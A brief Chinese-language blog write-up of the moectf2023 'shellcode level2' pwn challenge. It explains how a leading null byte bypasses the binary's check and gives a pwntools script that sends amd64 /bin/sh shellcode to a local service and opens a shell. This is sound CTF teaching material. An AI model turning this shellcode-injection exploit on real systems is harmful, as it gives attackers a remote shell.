moectf2023 - shellcode level2

RocketDev
  2023-09-24 12:00 2023-09-24 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载shellcode_level2, NX off, PIE on, Canary on, RELRO full
ghidra分析为64位程序

解题思路

该程序用gets读入100字节,shellcode随便打
程序运行一个变量+1对应的地址,且该变量首字节不为0则全部置0
即先放一个\0再放shellcode即可

EXPLOIT

1
2
3
4
5
from pwn import *
shc = asm(shellcraft.amd64.linux.sh(), arch='amd64')
sh = remote("localhost", 45341)
sh.sendline(b'\0' + shc)
sh.interactive()

Done.

  • 标题: moectf2023 - shellcode level2
  • 作者: RocketDev
  • 创建于 : 2023-09-24 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/24/shellcode_level2/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - shellcode level2
  1. 文件分析
  2. 解题思路
  3. EXPLOIT